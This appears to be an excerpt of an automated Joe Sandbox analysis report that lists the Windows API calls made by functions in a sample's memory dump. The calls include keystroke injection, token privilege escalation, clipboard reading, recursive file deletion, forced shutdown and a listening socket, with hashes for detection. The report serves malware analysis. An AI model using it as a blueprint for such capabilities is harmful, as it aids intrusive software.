                                                • IsIconic.USER32(00000000), ref: 0056F47D
                                                • ShowWindow.USER32(00000000,00000009), ref: 0056F48A
                                                • SetForegroundWindow.USER32(00000000), ref: 0056F494
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4AA
                                                • GetCurrentThreadId.KERNEL32 ref: 0056F4B1
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0056F4BD
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4CE
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 0056F4D6
                                                • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0056F4DE
                                                • SetForegroundWindow.USER32(00000000), ref: 0056F4E1
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F4F6
                                                • keybd_event.USER32(00000012,00000000), ref: 0056F501
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F50B
                                                • keybd_event.USER32(00000012,00000000), ref: 0056F510
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F519
                                                • keybd_event.USER32(00000012,00000000), ref: 0056F51E
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0056F528
                                                • keybd_event.USER32(00000012,00000000), ref: 0056F52D
                                                • SetForegroundWindow.USER32(00000000), ref: 0056F530
                                                • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0056F557
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
                                                • Instruction ID: 278717d20a80338e72325e7e96d7edf358076d615b21dfaf1c2bde6e3d2b49e1
                                                • Opcode Fuzzy Hash: 99dcc326617ac6edcfe96143e748ccaf05a2417d214f9cd84eeb4c75766db03b
                                                • Instruction Fuzzy Hash: 30311D71E40218BBEB216BB55C4AFBF7E6CEB59B50F100466FA01E71D1CAB15D00ABA0
                                                APIs
                                                  • Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                  • Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                  • Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A
                                                • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00571286
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005712A8
                                                • CloseHandle.KERNEL32(?), ref: 005712B9
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005712D1
                                                • GetProcessWindowStation.USER32 ref: 005712EA
                                                • SetProcessWindowStation.USER32(00000000), ref: 005712F4
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00571310
                                                  • Part of subcall function 005710BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
                                                  • Part of subcall function 005710BF: CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                • String ID: $default$winsta0$Z]
                                                • API String ID: 22674027-3859823317
                                                • Opcode ID: cfa20db2f9aa0c81c2ad5fbc50ee5cc67b406882830cf36ebc7e918e5d04dd3d
                                                • Instruction ID: fcdd763ae2acfa499678418ae0f127607029247847ce67abfbfdbfc937ca58c6
                                                • Opcode Fuzzy Hash: cfa20db2f9aa0c81c2ad5fbc50ee5cc67b406882830cf36ebc7e918e5d04dd3d
                                                • Instruction Fuzzy Hash: 4881AF71900609AFDF219FA8EC49FEE7FBAFF05700F148129F918A61A0D7318944EB64
                                                APIs
                                                  • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00571114
                                                  • Part of subcall function 005710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571120
                                                  • Part of subcall function 005710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 0057112F
                                                  • Part of subcall function 005710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00570B9B,?,?,?), ref: 00571136
                                                  • Part of subcall function 005710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0057114D
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00570BCC
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00570C00
                                                • GetLengthSid.ADVAPI32(?), ref: 00570C17
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00570C51
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00570C6D
                                                • GetLengthSid.ADVAPI32(?), ref: 00570C84
                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00570C8C
                                                • HeapAlloc.KERNEL32(00000000), ref: 00570C93
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00570CB4
                                                • CopySid.ADVAPI32(00000000), ref: 00570CBB
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00570CEA
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00570D0C
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00570D1E
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D45
                                                • HeapFree.KERNEL32(00000000), ref: 00570D4C
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D55
                                                • HeapFree.KERNEL32(00000000), ref: 00570D5C
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00570D65
                                                • HeapFree.KERNEL32(00000000), ref: 00570D6C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00570D78
                                                • HeapFree.KERNEL32(00000000), ref: 00570D7F
                                                  • Part of subcall function 00571193: GetProcessHeap.KERNEL32(00000008,00570BB1,?,00000000,?,00570BB1,?), ref: 005711A1
                                                  • Part of subcall function 00571193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00570BB1,?), ref: 005711A8
                                                  • Part of subcall function 00571193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00570BB1,?), ref: 005711B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 4175595110-0
                                                • Opcode ID: 77b9a56704e2ddca1891660ce72c81f3d1bf958924dd6dd603c3fa942a30b92a
                                                • Instruction ID: beedb129fadc94d7be722a950c97dc8b2c039ac6c1c8008448bc0a75d78e36c9
                                                • Opcode Fuzzy Hash: 77b9a56704e2ddca1891660ce72c81f3d1bf958924dd6dd603c3fa942a30b92a
                                                • Instruction Fuzzy Hash: F4713C71A0020AEBDF10DFA5EC48FAEBFB8BF15310F148515E919A7291D771A905EB60
                                                APIs
                                                • OpenClipboard.USER32(005ACC08), ref: 0058EB29
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0058EB37
                                                • GetClipboardData.USER32(0000000D), ref: 0058EB43
                                                • CloseClipboard.USER32 ref: 0058EB4F
                                                • GlobalLock.KERNEL32(00000000), ref: 0058EB87
                                                • CloseClipboard.USER32 ref: 0058EB91
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0058EBBC
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0058EBC9
                                                • GetClipboardData.USER32(00000001), ref: 0058EBD1
                                                • GlobalLock.KERNEL32(00000000), ref: 0058EBE2
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0058EC22
                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 0058EC38
                                                • GetClipboardData.USER32(0000000F), ref: 0058EC44
                                                • GlobalLock.KERNEL32(00000000), ref: 0058EC55
                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0058EC77
                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058EC94
                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0058ECD2
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0058ECF3
                                                • CountClipboardFormats.USER32 ref: 0058ED14
                                                • CloseClipboard.USER32 ref: 0058ED59
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                • String ID:
                                                • API String ID: 420908878-0
                                                • Opcode ID: 9f0b9efbb33bc0988138c330b50c787ea237afe7d4e7eb8efb686105dd8d5992
                                                • Instruction ID: 0a8b4eff1b4c06f5b63da2787e81935f4f73e1d3a40baabb761e3da65b3ec795
                                                • Opcode Fuzzy Hash: 9f0b9efbb33bc0988138c330b50c787ea237afe7d4e7eb8efb686105dd8d5992
                                                • Instruction Fuzzy Hash: 5661BF34204202AFD300EF24D89AF6ABFB4BF95714F14451DF896A72A2DB31DD49DB62
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 005869BE
                                                • FindClose.KERNEL32(00000000), ref: 00586A12
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A4E
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00586A75
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00586AB2
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00586ADF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                • API String ID: 3830820486-3289030164
                                                • Opcode ID: 941213a7484778ab32e6477e783abb961878883097c990a1b8d03eaa8b0e5402
                                                • Instruction ID: 6f7dfe815ac6d371e7caf7b60cfe1a6e556da292a00cf721f621d7a26a54f650
                                                • Opcode Fuzzy Hash: 941213a7484778ab32e6477e783abb961878883097c990a1b8d03eaa8b0e5402
                                                • Instruction Fuzzy Hash: ECD15F72508301AED314EBA4D895EAFBBECBF88704F04491DF985D7291EB34DA44CB62
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00589663
                                                • GetFileAttributesW.KERNEL32(?), ref: 005896A1
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 005896BB
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 005896D3
                                                • FindClose.KERNEL32(00000000), ref: 005896DE
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 005896FA
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0058974A
                                                • SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 00589768
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00589772
                                                • FindClose.KERNEL32(00000000), ref: 0058977F
                                                • FindClose.KERNEL32(00000000), ref: 0058978F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1409584000-438819550
                                                • Opcode ID: 3e2b08dc0ec6f1249e52e93c13f7404d6bfc605f81c451f1b10f59454175141a
                                                • Instruction ID: e06b54ad8eba499b6b8a4fe478946e26cd636b6fb4b98312bde7f07f89520740
                                                • Opcode Fuzzy Hash: 3e2b08dc0ec6f1249e52e93c13f7404d6bfc605f81c451f1b10f59454175141a
                                                • Instruction Fuzzy Hash: C531A03654021A6ADF24AFB5DC49AEE7FACFF4A320F184156F915F21A0EB30DE448B54
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 005897BE
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00589819
                                                • FindClose.KERNEL32(00000000), ref: 00589824
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00589840
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00589890
                                                • SetCurrentDirectoryW.KERNEL32(005D6B7C), ref: 005898AE
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 005898B8
                                                • FindClose.KERNEL32(00000000), ref: 005898C5
                                                • FindClose.KERNEL32(00000000), ref: 005898D5
                                                  • Part of subcall function 0057DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0057DB00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 2640511053-438819550
                                                • Opcode ID: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
                                                • Instruction ID: bd9c7d75efeca15d4609e96e3d13370477dbf0bc7207b4d0043f2a5b7b236691
                                                • Opcode Fuzzy Hash: af2324613f000af4f34e0b339afbc49c4d921261e59c532d40635e96c8dd665d
                                                • Instruction Fuzzy Hash: 5431B23150021A6AEF20BFA4EC48AEE7FACBF46324F184156E954B2190DB30DE498F60
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 00588257
                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00588267
                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00588273
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00588310
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00588324
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00588356
                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0058838C
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00588395
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                • String ID: *.*
                                                • API String ID: 1464919966-438819550
                                                • Opcode ID: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
                                                • Instruction ID: 7c475f708cf66aeafc0f9aa510feada81e8ccd3ae88b66f64402f6417c7d0f99
                                                • Opcode Fuzzy Hash: d6cc8b3e27ef4d0c61ede0a983e01e97532d2a048b51cb7c252edefd544a757f
                                                • Instruction Fuzzy Hash: 47619E755043069FD710EF64C8459AEBBE9FF89310F448C1EF98993251EB31E945CB92
                                                APIs
                                                  • Part of subcall function 00513AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00513A97,?,?,00512E7F,?,?,?,00000000), ref: 00513AC2
                                                  • Part of subcall function 0057E199: GetFileAttributesW.KERNEL32(?,0057CF95), ref: 0057E19A
                                                • FindFirstFileW.KERNEL32(?,?), ref: 0057D122
                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0057D1DD
                                                • MoveFileW.KERNEL32(?,?), ref: 0057D1F0
                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 0057D20D
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0057D237
                                                  • Part of subcall function 0057D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0057D21C,?,?), ref: 0057D2B2
                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 0057D253
                                                • FindClose.KERNEL32(00000000), ref: 0057D264
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 1946585618-1173974218
                                                • Opcode ID: 981ac46e5a791924acc255902c2526183e3029e099f4aaf21512f0d6a05bafef
                                                • Instruction ID: abb67afadee84401edae6accc36a28799cbe7b2ee976bf676f5319ac9f69929a
                                                • Opcode Fuzzy Hash: 981ac46e5a791924acc255902c2526183e3029e099f4aaf21512f0d6a05bafef
                                                • Instruction Fuzzy Hash: B1617F3180110EAADF05EBE0D9569EDBFB5BF95300F648065E40677192EB316F49EB60
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
                                                • Instruction ID: 2679c957e10afe80cde0d3453917f6397d87073afe060390bf164002e43e7b78
                                                • Opcode Fuzzy Hash: 40d53d5340cc6b32305873e304a09ba6f718dcd2d885cd50c9533605a6c0aa24
                                                • Instruction Fuzzy Hash: 8941CD35204611AFE320EF19D88AB19BFF5FF55318F14C499E8559B6A2C731EC46CB90
                                                APIs
                                                  • Part of subcall function 005716C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0057170D
                                                  • Part of subcall function 005716C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0057173A
                                                  • Part of subcall function 005716C3: GetLastError.KERNEL32 ref: 0057174A
                                                • ExitWindowsEx.USER32(?,00000000), ref: 0057E932
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $ $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-3163812486
                                                • Opcode ID: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
                                                • Instruction ID: 3d8285020655f0a4da70bace973e2ded67ee0411d300582781ff7b42d04a9a9f
                                                • Opcode Fuzzy Hash: a99771954b857ff24358e4ebec0add295ba28f475951914c1b531091c3dc5599
                                                • Instruction Fuzzy Hash: 86012B33610311ABEB642678BC8BFBF7E5CB719740F148862FE07E21D1D6605C44A294
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00591276
                                                • WSAGetLastError.WSOCK32 ref: 00591283
                                                • bind.WSOCK32(00000000,?,00000010), ref: 005912BA
                                                • WSAGetLastError.WSOCK32 ref: 005912C5
                                                • closesocket.WSOCK32(00000000), ref: 005912F4
                                                • listen.WSOCK32(00000000,00000005), ref: 00591303
                                                • WSAGetLastError.WSOCK32 ref: 0059130D
                                                • closesocket.WSOCK32(00000000), ref: 0059133C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                • String ID:
                                                • API String ID: 540024437-0
                                                • Opcode ID: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
                                                • Instruction ID: 56d52344c05c3da122d081dace615ef2e542fafc9548844fce2655244f72d4ef
                                                • Opcode Fuzzy Hash: 93cef969da796da19ceebe48d052bfd0765d33f128b678d9899cb982a21ae9fa
                                                • Instruction Fuzzy Hash: F34190356005129FDB10EF24C488B69BFE6BF86318F188588E8568F2D2C775EC85CBE1
                                                APIs
                                                • _free.LIBCMT ref: 0054B9D4
                                                • _free.LIBCMT ref: 0054B9F8
                                                • _free.LIBCMT ref: 0054BB7F
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,005B3700), ref: 0054BB91
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,005E121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0054BC09
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,005E1270,000000FF,?,0000003F,00000000,?), ref: 0054BC36
                                                • _free.LIBCMT ref: 0054BD4B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
